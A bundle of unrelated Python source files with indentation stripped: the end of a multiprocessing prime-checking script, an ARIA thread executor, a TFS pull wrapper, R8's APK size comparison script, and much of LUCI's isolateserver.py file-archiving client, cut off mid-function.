hub = Hub(SAMPLE_TASK, SAMPLE_ARGS, poolsize=worker_count)
timestamp = perf_counter()
hub.start() # this blocks until answersheet is done
print("Time spent (including waiting for workers):", perf_counter()-timestamp)
print("\nSelected excerpt from hub.answersheet:")
print_counter = 0
for arg, ans in hub.answersheet.items():
if ans:
print(arg, "is prime.")
print_counter += 1
if print_counter >= 30:
break
break
if inp == "W":
while True: # loop for valid input
worker_count = input("Please enter the number of worker procsesses you want to create: ")
try:
worker_count = int(worker_count)
if worker_count <= 0:
continue
except ValueError:
pass
else:
break
worker_processes = []
while True: # likanen tunkki. 5 riviä muutoksia tässä.
for i in range(worker_count): # spawn multiple worker processes #!!!
process = multiprocessing.Process(target=_worker_helper) #!!!
worker_processes.append(process) #!!!
process.start() #!!!
while True: # block until all workers done
from time import sleep
sleep(1)
if all([not i.is_alive() for i in worker_processes]):
break
break # TÄMÄ PITÄÄ SÄILYTÄÄ #!!!!!
else:
continue
if __name__ == "__main__":
_ = system("cls||clear") # clear screen on windows and unix
multiprocessing.set_start_method('spawn')
#if name == "nt":
# # windows compability. default is to fork in windows.
# multiprocessing.set_start_method("spawn")
main()
|
thread.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Thread based executor
"""
import Queue
import threading
from aria.utils import imports
from .base import BaseExecutor
class ThreadExecutor(BaseExecutor):
"""
Executor which runs tasks in a separate thread. It's easier writing tests
using this executor rather than the full blown subprocess executor.
Note: This executor is not capable of running plugin operations.
"""
def __init__(self, pool_size=1, *args, **kwargs):
super(ThreadExecutor, self).__init__(*args, **kwargs)
self._stopped = False
self._queue = Queue.Queue()
self._pool = []
for i in range(pool_size):
name = 'ThreadExecutor-{index}'.format(index=i+1)
thread = threading.Thread(target=self._processor, name=name)
thread.daemon = True
thread.start()
self._pool.append(thread)
def execute(self, task):
self._queue.put(task)
def close(self):
self._stopped = True
for thread in self._pool:
thread.join()
def _processor(self):
while not self._stopped:
try:
task = self._queue.get(timeout=1)
self._task_started(task)
try:
task_func = imports.load_attribute(task.operation_mapping)
task_func(ctx=task.context, **task.inputs)
self._task_succeeded(task)
except BaseException as e:
self._task_failed(task, exception=e)
# Daemon threads
except BaseException:
pass
|
tfs.py
|
import subprocess
import traceback
from threading import Thread
class TFS:
def __init__(self, site_id, site_path, app):
self._site_id = site_id
self._site_path = site_path
self._app = app
self._proc = None
def start_pull(self):
self._proc = subprocess.Popen(('tfs.bat', self._site_path),
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._clear_output()
self._set_output('Pull Process ID: ' + str(self._proc.pid) + '\r\n\r\n')
Thread(target=self._read).start()
def _set_output(self, text):
self._app.set_console_output(self._site_id, text)
def _clear_output(self):
self._app.clear_console_output(self._site_id)
def _wait_stop(self):
if self._proc:
code = self._proc.wait()
self._set_output('Pull Exit Code: ' + str(code))
self._proc = None
def _read(self):
try:
for line in self._proc.stdout:
self._set_output(line.decode())
if not line or line.startswith(b'-end'):
self._wait_stop()
break
except:
traceback.print_exc()
|
compare_apk_sizes.py
|
#!/usr/bin/env python
# Copyright (c) 2018, the R8 project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
# Script for checking impact of a change by comparing the sizes of generated
# classes in an apk.
import glob
import optparse
import os
import shutil
import sys
import threading
import time
import toolhelper
import utils
import zipfile
import StringIO
USAGE = """%prog [options] app1 app2
NOTE: This only makes sense if minification is disabled"""
MAX_THREADS=40
def parse_options():
result = optparse.OptionParser(usage=USAGE)
result.add_option('--temp',
help='Temporary directory to store extracted classes in')
result.add_option('--use_code_size',
help='Use the size of code segments instead of the full size of the dex.',
default=False, action='store_true')
result.add_option('--report',
help='Print comparison to this location instead of stdout')
return result.parse_args()
def extract_apk(apk, output):
if os.path.exists(output):
shutil.rmtree(output)
zipfile.ZipFile(apk).extractall(output)
with utils.ChangedWorkingDirectory(output):
dex = glob.glob('*.dex')
return [os.path.join(output, dexfile) for dexfile in dex]
def ensure_exists(files):
for f in files:
if not os.path.exists(f):
raise Exception('%s does not exist')
def extract_classes(input, output):
if os.path.exists(output):
shutil.rmtree(output)
os.makedirs(output)
args = ['--file-per-class',
'--output', output]
args.extend(input)
if toolhelper.run('d8', args) is not 0:
raise Exception('Failed running d8')
def get_code_size(path):
segments = toolhelper.run('dexsegments',
[path],
build=False,
return_stdout=True)
for line in segments.splitlines():
if 'Code' in line:
# The code size line looks like:
# - Code: 264 / 4
splits = line.split(' ')
return int(splits[3])
# Some classes has no code.
return 0
class FileInfo:
def __init__(self, path, root):
self.path = path
self.full_path = os.path.join(root, path)
def __eq__(self, other):
return self.full_path == other.full_path
def set_size(self, use_code_size):
if use_code_size:
self.size = get_code_size(self.full_path)
else:
self.size = os.path.getsize(self.full_path)
def generate_file_info(path, options):
file_info_map = {}
with utils.ChangedWorkingDirectory(path):
for root, dirs, files in os.walk('.'):
for f in files:
assert f.endswith('dex')
file_path = os.path.join(root, f)
entry = FileInfo(file_path, path)
if not options.use_code_size:
entry.set_size(False)
file_info_map[file_path] = entry
threads = []
file_infos = file_info_map.values() if options.use_code_size else []
while len(file_infos) > 0 or len(threads)> 0:
for t in threads:
if not t.is_alive():
threads.remove(t)
# sleep
if len(threads) == MAX_THREADS or len(file_infos) == 0:
time.sleep(0.5)
while len(threads) < MAX_THREADS and len(file_infos) > 0:
info = file_infos.pop()
print('Added %s for size calculation' % info.full_path)
t = threading.Thread(target=info.set_size, args=(options.use_code_size,))
threads.append(t)
t.start()
print('Missing %s files, threads=%s ' % (len(file_infos), len(threads)))
return file_info_map
def print_info(app, app_files, only_in_app, bigger_in_app, output):
output.write('Only in %s\n' % app)
only_app_sorted = sorted(only_in_app,
key=lambda a: app_files[a].size,
reverse=True)
output.write('\n'.join([' %s %s bytes' %
(x, app_files[x].size) for x in only_app_sorted]))
output.write('\n\n')
output.write('Bigger in %s\n' % app)
# Sort by the percentage diff compared to size
percent = lambda a: (0.0 + bigger_in_app.get(a))/app_files.get(a).size * 100
for bigger in sorted(bigger_in_app, key=percent, reverse=True):
output.write(' {0:.3f}% {1} bytes {2}\n'.format(percent(bigger),
bigger_in_app[bigger],
bigger))
output.write('\n\n')
def compare(app1_classes_dir, app2_classes_dir, app1, app2, options):
app1_files = generate_file_info(app1_classes_dir, options)
app2_files = generate_file_info(app2_classes_dir, options)
only_in_app1 = [k for k in app1_files if k not in app2_files]
only_in_app2 = [k for k in app2_files if k not in app1_files]
in_both = [k for k in app2_files if k in app1_files]
assert len(app1_files) == len(only_in_app1) + len(in_both)
assert len(app2_files) == len(only_in_app2) + len(in_both)
bigger_in_app1 = {}
bigger_in_app2 = {}
same_size = []
for f in in_both:
app1_entry = app1_files[f]
app2_entry = app2_files[f]
if app1_entry.size > app2_entry.size:
bigger_in_app1[f] = app1_entry.size - app2_entry.size
elif app2_entry.size > app1_entry.size:
bigger_in_app2[f] = app2_entry.size - app1_entry.size
else:
same_size.append(f)
output = open(options.report, 'w') if options.report else sys.stdout
print_info(app1, app1_files, only_in_app1, bigger_in_app1, output)
print_info(app2, app2_files, only_in_app2, bigger_in_app2, output)
output.write('Same size\n')
output.write('\n'.join([' %s' % x for x in same_size]))
if options.report:
output.close()
def Main():
(options, args) = parse_options()
if len(args) is not 2:
print args
print('Takes exactly two arguments, the two apps to compare')
return 1
app1 = args[0]
app2 = args[1]
ensure_exists([app1, app2])
with utils.TempDir() as temporary:
# If a temp dir is passed in, use that instead of the generated temporary
output = options.temp if options.temp else temporary
ensure_exists([output])
app1_input = [app1]
app2_input = [app2]
if app1.endswith('apk'):
app1_input = extract_apk(app1, os.path.join(output, 'app1'))
if app2.endswith('apk'):
app2_input = extract_apk(app2, os.path.join(output, 'app2'))
app1_classes_dir = os.path.join(output, 'app1_classes')
app2_classes_dir = os.path.join(output, 'app2_classes')
extract_classes(app1_input, app1_classes_dir)
extract_classes(app2_input, app2_classes_dir)
compare(app1_classes_dir, app2_classes_dir, app1, app2, options)
if __name__ == '__main__':
sys.exit(Main())
|
isolateserver.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Archives a set of files or directories to an Isolate Server."""
__version__ = '0.9.0'
import collections
import errno
import functools
import logging
import optparse
import os
import re
import signal
import stat
import sys
import tarfile
import threading
import time
import zlib
from utils import tools
tools.force_local_third_party()
# third_party/
import colorama
from depot_tools import fix_encoding
from depot_tools import subcommand
import six
from six.moves import queue as Queue
# pylint: disable=ungrouped-imports
import auth
import isolated_format
import isolate_storage
import local_caching
from utils import file_path
from utils import fs
from utils import logging_utils
from utils import net
from utils import on_error
from utils import subprocess42
from utils import threading_utils
# Version of isolate protocol passed to the server in /handshake request.
ISOLATE_PROTOCOL_VERSION = '1.0'
# Maximum expected delay (in seconds) between successive file fetches or uploads
# in Storage. If it takes longer than that, a deadlock might be happening
# and all stack frames for all threads are dumped to log.
DEADLOCK_TIMEOUT = 5 * 60
# The number of files to check the isolate server per /pre-upload query.
# All files are sorted by likelihood of a change in the file content
# (currently file size is used to estimate this: larger the file -> larger the
# possibility it has changed). Then first ITEMS_PER_CONTAINS_QUERIES[0] files
# are taken and send to '/pre-upload', then next ITEMS_PER_CONTAINS_QUERIES[1],
# and so on. Numbers here is a trade-off; the more per request, the lower the
# effect of HTTP round trip latency and TCP-level chattiness. On the other hand,
# larger values cause longer lookups, increasing the initial latency to start
# uploading, which is especially an issue for large files. This value is
# optimized for the "few thousands files to look up with minimal number of large
# files missing" case.
ITEMS_PER_CONTAINS_QUERIES = (20, 20, 50, 50, 50, 100)
# A list of already compressed extension types that should not receive any
# compression before being uploaded.
ALREADY_COMPRESSED_TYPES = [
'7z', 'avi', 'cur', 'gif', 'h264', 'jar', 'jpeg', 'jpg', 'mp4', 'pdf',
'png', 'wav', 'zip',
]
# The delay (in seconds) to wait between logging statements when retrieving
# the required files. This is intended to let the user (or buildbot) know that
# the program is still running.
DELAY_BETWEEN_UPDATES_IN_SECS = 30
DEFAULT_BLACKLIST = (
# Temporary vim or python files.
r'^.+\.(?:pyc|swp)$',
# .git or .svn directory.
r'^(?:.+' + re.escape(os.path.sep) + r'|)\.(?:git|svn)$',
)
class Error(Exception):
"""Generic runtime error."""
pass
class Aborted(Error):
"""Operation aborted."""
pass
class AlreadyExists(Error):
"""File already exists."""
def file_read(path, chunk_size=isolated_format.DISK_FILE_CHUNK, offset=0):
"""Yields file content in chunks of |chunk_size| starting from |offset|."""
with fs.open(path, 'rb') as f:
if offset:
f.seek(offset)
while True:
data = f.read(chunk_size)
if not data:
break
yield data
def fileobj_path(fileobj):
"""Return file system path for file like object or None.
The returned path is guaranteed to exist and can be passed to file system
operations like copy.
"""
name = getattr(fileobj, 'name', None)
if name is None:
return None
# If the file like object was created using something like open("test.txt")
# name will end up being a str (such as a function outside our control, like
# the standard library). We want all our paths to be unicode objects, so we
# decode it.
if not isinstance(name, six.text_type):
# We incorrectly assume that UTF-8 is used everywhere.
name = name.decode('utf-8')
# fs.exists requires an absolute path, otherwise it will fail with an
# assertion error.
if not os.path.isabs(name):
return None
if fs.exists(name):
return name
return None
# TODO(tansell): Replace fileobj_copy with shutil.copyfileobj once proper file
# wrappers have been created.
def fileobj_copy(
dstfileobj, srcfileobj, size=-1,
chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Copy data from srcfileobj to dstfileobj.
Providing size means exactly that amount of data will be copied (if there
isn't enough data, an IOError exception is thrown). Otherwise all data until
the EOF marker will be copied.
"""
if size == -1 and hasattr(srcfileobj, 'tell'):
if srcfileobj.tell() != 0:
raise IOError('partial file but not using size')
written = 0
while written != size:
readsize = chunk_size
if size > 0:
readsize = min(readsize, size-written)
data = srcfileobj.read(readsize)
if not data:
if size == -1:
break
raise IOError('partial file, got %s, wanted %s' % (written, size))
dstfileobj.write(data)
written += len(data)
def putfile(srcfileobj, dstpath, file_mode=None, size=-1, use_symlink=False):
"""Put srcfileobj at the given dstpath with given mode.
The function aims to do this as efficiently as possible while still allowing
any possible file like object be given.
Creating a tree of hardlinks has a few drawbacks:
- tmpfs cannot be used for the scratch space. The tree has to be on the same
partition as the cache.
- involves a write to the inode, which advances ctime, cause a metadata
writeback (causing disk seeking).
- cache ctime cannot be used to detect modifications / corruption.
- Some file systems (NTFS) have a 64k limit on the number of hardlink per
partition. This is why the function automatically fallbacks to copying the
file content.
- /proc/sys/fs/protected_hardlinks causes an additional check to ensure the
same owner is for all hardlinks.
- Anecdotal report that ext2 is known to be potentially faulty on high rate
of hardlink creation.
Creating a tree of symlinks has a few drawbacks:
- Tasks running the equivalent of os.path.realpath() will get the naked path
and may fail.
- Windows:
- Symlinks are reparse points:
https://msdn.microsoft.com/library/windows/desktop/aa365460.aspx
https://msdn.microsoft.com/library/windows/desktop/aa363940.aspx
- Symbolic links are Win32 paths, not NT paths.
https://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32-to-nt.html
- Symbolic links are supported on Windows 7 and later only.
- SeCreateSymbolicLinkPrivilege is needed, which is not present by
default.
- SeCreateSymbolicLinkPrivilege is *stripped off* by UAC when a restricted
RID is present in the token;
https://msdn.microsoft.com/en-us/library/bb530410.aspx
"""
srcpath = fileobj_path(srcfileobj)
if srcpath and size == -1:
readonly = file_mode is None or (
file_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH))
if readonly:
# If the file is read only we can link the file
if use_symlink:
link_mode = file_path.SYMLINK_WITH_FALLBACK
else:
link_mode = file_path.HARDLINK_WITH_FALLBACK
else:
# If not read only, we must copy the file
link_mode = file_path.COPY
file_path.link_file(dstpath, srcpath, link_mode)
assert fs.exists(dstpath)
else:
# Need to write out the file
with fs.open(dstpath, 'wb') as dstfileobj:
fileobj_copy(dstfileobj, srcfileobj, size)
if sys.platform == 'win32' and file_mode and file_mode & stat.S_IWRITE:
# On windows, mode other than removing stat.S_IWRITE is ignored. Returns
# early to skip slow/unnecessary chmod call.
return
# file_mode of 0 is actually valid, so need explicit check.
if file_mode is not None:
fs.chmod(dstpath, file_mode)
def zip_compress(content_generator, level=7):
"""Reads chunks from |content_generator| and yields zip compressed chunks."""
compressor = zlib.compressobj(level)
for chunk in content_generator:
compressed = compressor.compress(chunk)
if compressed:
yield compressed
tail = compressor.flush(zlib.Z_FINISH)
if tail:
yield tail
def zip_decompress(
content_generator, chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Reads zipped data from |content_generator| and yields decompressed data.
Decompresses data in small chunks (no larger than |chunk_size|) so that
zip bomb file doesn't cause zlib to preallocate huge amount of memory.
Raises IOError if data is corrupted or incomplete.
"""
decompressor = zlib.decompressobj()
compressed_size = 0
try:
for chunk in content_generator:
compressed_size += len(chunk)
data = decompressor.decompress(chunk, chunk_size)
if data:
yield data
while decompressor.unconsumed_tail:
data = decompressor.decompress(decompressor.unconsumed_tail, chunk_size)
if data:
yield data
tail = decompressor.flush()
if tail:
yield tail
except zlib.error as e:
raise IOError(
'Corrupted zip stream (read %d bytes) - %s' % (compressed_size, e))
# Ensure all data was read and decompressed.
if decompressor.unused_data or decompressor.unconsumed_tail:
raise IOError('Not all data was decompressed')
def _get_zip_compression_level(filename):
"""Given a filename calculates the ideal zip compression level to use."""
file_ext = os.path.splitext(filename)[1].lower()
# TODO(csharp): Profile to find what compression level works best.
return 0 if file_ext in ALREADY_COMPRESSED_TYPES else 7
def create_directories(base_directory, files):
"""Creates the directory structure needed by the given list of files."""
logging.debug('create_directories(%s, %d)', base_directory, len(files))
# Creates the tree of directories to create.
directories = set(os.path.dirname(f) for f in files)
for item in list(directories):
while item:
directories.add(item)
item = os.path.dirname(item)
for d in sorted(directories):
if d:
abs_d = os.path.join(base_directory, d)
if not fs.isdir(abs_d):
fs.mkdir(abs_d)
def _create_symlinks(base_directory, files):
"""Creates any symlinks needed by the given set of files."""
for filepath, properties in files:
if 'l' not in properties:
continue
if sys.platform == 'win32':
# TODO(maruel): Create symlink via the win32 api.
logging.warning('Ignoring symlink %s', filepath)
continue
outfile = os.path.join(base_directory, filepath)
try:
os.symlink(properties['l'], outfile) # pylint: disable=E1101
except OSError as e:
if e.errno == errno.EEXIST:
raise AlreadyExists('File %s already exists.' % outfile)
raise
class _ThreadFile(object):
"""Multithreaded fake file. Used by TarBundle."""
def __init__(self):
self._data = threading_utils.TaskChannel()
self._offset = 0
def __iter__(self):
return self._data
def tell(self):
return self._offset
def write(self, b):
self._data.send_result(b)
self._offset += len(b)
def close(self):
self._data.send_done()
class FileItem(isolate_storage.Item):
"""A file to push to Storage.
Its digest and size may be provided in advance, if known. Otherwise they will
be derived from the file content.
"""
def __init__(self, path, algo, digest=None, size=None, high_priority=False):
super(FileItem, self).__init__(
digest,
size if size is not None else fs.stat(path).st_size,
high_priority,
compression_level=_get_zip_compression_level(path))
self._path = path
self._algo = algo
self._meta = None
@property
def path(self):
return self._path
@property
def digest(self):
if not self._digest:
self._digest = isolated_format.hash_file(self._path, self._algo)
return self._digest
@property
def meta(self):
if not self._meta:
# TODO(maruel): Inline.
self._meta = isolated_format.file_to_metadata(self.path, 0, False)
# We need to hash right away.
self._meta['h'] = self.digest
return self._meta
def content(self):
return file_read(self.path)
class TarBundle(isolate_storage.Item):
"""Tarfile to push to Storage.
Its digest is the digest of all the files it contains. It is generated on the
fly.
"""
def __init__(self, root, algo):
# 2 trailing 512 bytes headers.
super(TarBundle, self).__init__(size=1024)
self._items = []
self._meta = None
self._algo = algo
self._root_len = len(root) + 1
# Same value as for Go.
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/tar_archiver.go
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/upload_tracker.go
self._archive_max_size = int(10e6)
@property
def digest(self):
if not self._digest:
self._prepare()
return self._digest
@property
def size(self):
if self._size is None:
self._prepare()
return self._size
def try_add(self, item):
"""Try to add this file to the bundle.
It is extremely naive but this should be just enough for
https://crbug.com/825418.
Future improvements should be in the Go code, and the Swarming bot should be
migrated to use the Go code instead.
"""
if not item.size:
return False
# pylint: disable=unreachable
rounded = (item.size + 512) & ~511
if rounded + self._size > self._archive_max_size:
return False
# https://crbug.com/825418
return False
self._size += rounded
self._items.append(item)
return True
def yield_item_path_meta(self):
"""Returns a tuple(Item, filepath, meta_dict).
If the bundle contains less than 5 items, the items are yielded.
"""
if len(self._items) < 5:
# The tarball is too small, yield individual items, if any.
for item in self._items:
yield item, item.path[self._root_len:], item.meta
else:
# This ensures self._meta is set.
p = self.digest + '.tar'
# Yield itself as a tarball.
yield self, p, self._meta
def content(self):
"""Generates the tarfile content on the fly."""
obj = _ThreadFile()
def _tar_thread():
try:
t = tarfile.open(
fileobj=obj, mode='w', format=tarfile.PAX_FORMAT, encoding='utf-8')
for item in self._items:
logging.info(' tarring %s', item.path)
t.add(item.path)
t.close()
except Exception:
logging.exception('Internal failure')
finally:
obj.close()
t = threading.Thread(target=_tar_thread)
t.start()
try:
for data in obj:
yield data
finally:
t.join()
def _prepare(self):
h = self._algo()
total = 0
for chunk in self.content():
h.update(chunk)
total += len(chunk)
# pylint: disable=attribute-defined-outside-init
# This is not true, they are defined in Item.__init__().
self._digest = h.hexdigest()
self._size = total
self._meta = {
'h': self.digest,
's': self.size,
't': u'tar',
}
class BufferItem(isolate_storage.Item):
"""A byte buffer to push to Storage."""
def __init__(self, buf, algo, high_priority=False):
super(BufferItem, self).__init__(
digest=algo(buf).hexdigest(),
size=len(buf),
high_priority=high_priority)
self._buffer = buf
def content(self):
return [self._buffer]
class Storage(object):
"""Efficiently downloads or uploads large set of files via StorageApi.
Implements compression support, parallel 'contains' checks, parallel uploads
and more.
Works only within single namespace (and thus hashing algorithm and compression
scheme are fixed).
Spawns multiple internal threads. Thread safe, but not fork safe. Modifies
signal handlers table to handle Ctrl+C.
"""
def __init__(self, storage_api):
self._storage_api = storage_api
self._cpu_thread_pool = None
self._net_thread_pool = None
self._aborted = False
self._prev_sig_handlers = {}
@property
def server_ref(self):
"""Shortcut to get the server_ref from storage_api.
This can be used to get the underlying hash_algo.
"""
return self._storage_api.server_ref
@property
def cpu_thread_pool(self):
"""ThreadPool for CPU-bound tasks like zipping."""
if self._cpu_thread_pool is None:
threads = max(threading_utils.num_processors(), 2)
max_size = long(2)**32 if sys.version_info.major == 2 else 2**32
if sys.maxsize <= max_size:
# On 32 bits userland, do not try to use more than 16 threads.
threads = min(threads, 16)
self._cpu_thread_pool = threading_utils.ThreadPool(2, threads, 0, 'zip')
return self._cpu_thread_pool
@property
def net_thread_pool(self):
"""AutoRetryThreadPool for IO-bound tasks, retries IOError."""
if self._net_thread_pool is None:
self._net_thread_pool = threading_utils.IOAutoRetryThreadPool()
return self._net_thread_pool
def close(self):
"""Waits for all pending tasks to finish."""
logging.info('Waiting for all threads to die...')
if self._cpu_thread_pool:
self._cpu_thread_pool.join()
self._cpu_thread_pool.close()
self._cpu_thread_pool = None
if self._net_thread_pool:
self._net_thread_pool.join()
self._net_thread_pool.close()
self._net_thread_pool = None
logging.info('Done.')
def abort(self):
"""Cancels any pending or future operations."""
# This is not strictly theadsafe, but in the worst case the logging message
# will be printed twice. Not a big deal. In other places it is assumed that
# unprotected reads and writes to _aborted are serializable (it is true
# for python) and thus no locking is used.
if not self._aborted:
logging.warning('Aborting... It can take a while.')
self._aborted = True
def __enter__(self):
"""Context manager interface."""
assert not self._prev_sig_handlers, self._prev_sig_handlers
for s in (signal.SIGINT, signal.SIGTERM):
self._prev_sig_handlers[s] = signal.signal(s, lambda *_args: self.abort())
return self
def __exit__(self, _exc_type, _exc_value, _traceback):
"""Context manager interface."""
self.close()
while self._prev_sig_handlers:
s, h = self._prev_sig_handlers.popitem()
signal.signal(s, h)
return False
def upload_items(self, items):
"""Uploads a generator of Item to the isolate server.
It figures out what items are missing from the server and uploads only them.
It uses 3 threads internally:
- One to create batches based on a timeout
- One to dispatch the /contains RPC and field the missing entries
- One to field the /push RPC
The main threads enumerates 'items' and pushes to the first thread. Then it
join() all the threads, waiting for them to complete.
(enumerate items of Item, this can be slow as disk is traversed)
|
v
_create_items_batches_thread Thread #1
(generates list(Item), every 3s or 20~100 items)
|
v
_do_lookups_thread Thread #2
| |
v v
(missing) (was on server)
|
v
_handle_missing_thread Thread #3
|
v
(upload Item, append to uploaded)
Arguments:
items: list of isolate_storage.Item instances that represents data to
upload.
Returns:
List of items that were uploaded. All other items are already there.
"""
incoming = Queue.Queue()
batches_to_lookup = Queue.Queue()
missing = Queue.Queue()
uploaded = []
def _create_items_batches_thread():
"""Creates batches for /contains RPC lookup from individual items.
Input: incoming
Output: batches_to_lookup
"""
try:
batch_size_index = 0
batch_size = ITEMS_PER_CONTAINS_QUERIES[batch_size_index]
batch = []
while not self._aborted:
try:
item = incoming.get(True, timeout=3)
if item:
batch.append(item)
except Queue.Empty:
item = False
if len(batch) == batch_size or (not item and batch):
if len(batch) == batch_size:
batch_size_index += 1
batch_size = ITEMS_PER_CONTAINS_QUERIES[
min(batch_size_index, len(ITEMS_PER_CONTAINS_QUERIES)-1)]
batches_to_lookup.put(batch)
batch = []
if item is None:
break
finally:
# Unblock the next pipeline.
batches_to_lookup.put(None)
def _do_lookups_thread():
"""Enqueues all the /contains RPCs and emits the missing items.
Input: batches_to_lookup
Output: missing, to_upload
"""
try:
channel = threading_utils.TaskChannel()
def _contains(b):
if self._aborted:
raise Aborted()
return self._storage_api.contains(b)
pending_contains = 0
while not self._aborted:
batch = batches_to_lookup.get()
if batch is None:
break
self.net_thread_pool.add_task_with_channel(
channel, threading_utils.PRIORITY_HIGH, _contains, batch)
pending_contains += 1
while pending_contains and not self._aborted:
try:
v = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
pending_contains -= 1
for missing_item, push_state in v.items():
missing.put((missing_item, push_state))
while pending_contains and not self._aborted:
for missing_item, push_state in channel.next().items():
missing.put((missing_item, push_state))
pending_contains -= 1
finally:
# Unblock the next pipeline.
missing.put((None, None))
def _handle_missing_thread():
"""Sends the missing items to the uploader.
Input: missing
Output: uploaded
"""
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
channel = threading_utils.TaskChannel()
pending_upload = 0
while not self._aborted:
try:
missing_item, push_state = missing.get(True, timeout=5)
if missing_item is None:
break
self._async_push(channel, missing_item, push_state)
pending_upload += 1
except Queue.Empty:
pass
detector.ping()
while not self._aborted and pending_upload:
try:
item = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
uploaded.append(item)
pending_upload -= 1
logging.debug(
'Uploaded %d; %d pending: %s (%d)',
len(uploaded), pending_upload, item.digest, item.size)
while not self._aborted and pending_upload:
item = channel.next()
uploaded.append(item)
pending_upload -= 1
logging.debug(
'Uploaded %d; %d pending: %s (%d)',
len(uploaded), pending_upload, item.digest, item.size)
threads = [
threading.Thread(target=_create_items_batches_thread),
threading.Thread(target=_do_lookups_thread),
threading.Thread(target=_handle_missing_thread),
]
for t in threads:
t.start()
try:
# For each digest keep only first isolate_storage.Item that matches it.
# All other items are just indistinguishable copies from the point of view
# of isolate server (it doesn't care about paths at all, only content and
# digests).
seen = {}
try:
# TODO(maruel): Reorder the items as a priority queue, with larger items
# being processed first. This is, before hashing the data.
# This must be done in the primary thread since items can be a
# generator.
for item in items:
if seen.setdefault(item.digest, item) is item:
incoming.put(item)
finally:
incoming.put(None)
finally:
for t in threads:
t.join()
logging.info('All %s files are uploaded', len(uploaded))
if seen:
_print_upload_stats(seen.values(), uploaded)
return uploaded
def _async_push(self, channel, item, push_state):
"""Starts asynchronous push to the server in a parallel thread.
Can be used only after |item| was checked for presence on a server with a
/contains RPC.
Arguments:
channel: TaskChannel that receives back |item| when upload ends.
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
Returns:
None, but |channel| later receives back |item| when upload ends.
"""
# Thread pool task priority.
priority = (
threading_utils.PRIORITY_HIGH if item.high_priority
else threading_utils.PRIORITY_MED)
def _push(content):
"""Pushes an isolate_storage.Item and returns it to |channel|."""
if self._aborted:
raise Aborted()
self._storage_api.push(item, push_state, content)
return item
# If zipping is not required, just start a push task. Don't pass 'content'
# so that it can create a new generator when it retries on failures.
if not self.server_ref.is_with_compression:
self.net_thread_pool.add_task_with_channel(channel, priority, _push, None)
return
# If zipping is enabled, zip in a separate thread.
def zip_and_push():
# TODO(vadimsh): Implement streaming uploads. Before it's done, assemble
# content right here. It will block until all file is zipped.
try:
if self._aborted:
raise Aborted()
stream = zip_compress(item.content(), item.compression_level)
data = ''.join(stream)
except Exception as exc:
logging.error('Failed to zip \'%s\': %s', item, exc)
channel.send_exception()
return
# Pass '[data]' explicitly because the compressed data is not same as the
# one provided by 'item'. Since '[data]' is a list, it can safely be
# reused during retries.
self.net_thread_pool.add_task_with_channel(
channel, priority, _push, [data])
self.cpu_thread_pool.add_task(priority, zip_and_push)
def push(self, item, push_state):
"""Synchronously pushes a single item to the server.
If you need to push many items at once, consider using 'upload_items' or
'_async_push' with instance of TaskChannel.
Arguments:
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
Returns:
Pushed item (same object as |item|).
"""
channel = threading_utils.TaskChannel()
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT):
self._async_push(channel, item, push_state)
pushed = channel.next()
assert pushed is item
return item
def async_fetch(self, channel, priority, digest, size, sink):
"""Starts asynchronous fetch from the server in a parallel thread.
Arguments:
channel: TaskChannel that receives back |digest| when download ends.
priority: thread pool task priority for the fetch.
digest: hex digest of an item to download.
size: expected size of the item (after decompression).
sink: function that will be called as sink(generator).
"""
def fetch():
try:
# Prepare reading pipeline.
stream = self._storage_api.fetch(digest, size, 0)
if self.server_ref.is_with_compression:
stream = zip_decompress(stream, isolated_format.DISK_FILE_CHUNK)
# Run |stream| through verifier that will assert its size.
verifier = FetchStreamVerifier(
stream, self.server_ref.hash_algo, digest, size)
# Verified stream goes to |sink|.
sink(verifier.run())
except Exception as err:
logging.error('Failed to fetch %s: %s', digest, err)
raise
return digest
# Don't bother with zip_thread_pool for decompression. Decompression is
# really fast and most probably IO bound anyway.
self.net_thread_pool.add_task_with_channel(channel, priority, fetch)
class FetchQueue(object):
"""Fetches items from Storage and places them into ContentAddressedCache.
It manages multiple concurrent fetch operations. Acts as a bridge between
Storage and ContentAddressedCache so that Storage and ContentAddressedCache
don't depend on each other at all.
"""
def __init__(self, storage, cache):
self.storage = storage
self.cache = cache
self._channel = threading_utils.TaskChannel()
self._pending = set()
self._accessed = set()
self._fetched = set(cache)
# Pending digests that the caller waits for, see wait_on()/wait().
self._waiting_on = set()
# Already fetched digests the caller waits for which are not yet returned by
# wait().
self._waiting_on_ready = set()
def add(
self,
digest,
size=local_caching.UNKNOWN_FILE_SIZE,
priority=threading_utils.PRIORITY_MED):
"""Starts asynchronous fetch of item |digest|."""
# Fetching it now?
if digest in self._pending:
return
# Mark this file as in use, verify_all_cached will later ensure it is still
# in cache.
self._accessed.add(digest)
# Already fetched? Notify cache to update item's LRU position.
if digest in self._fetched:
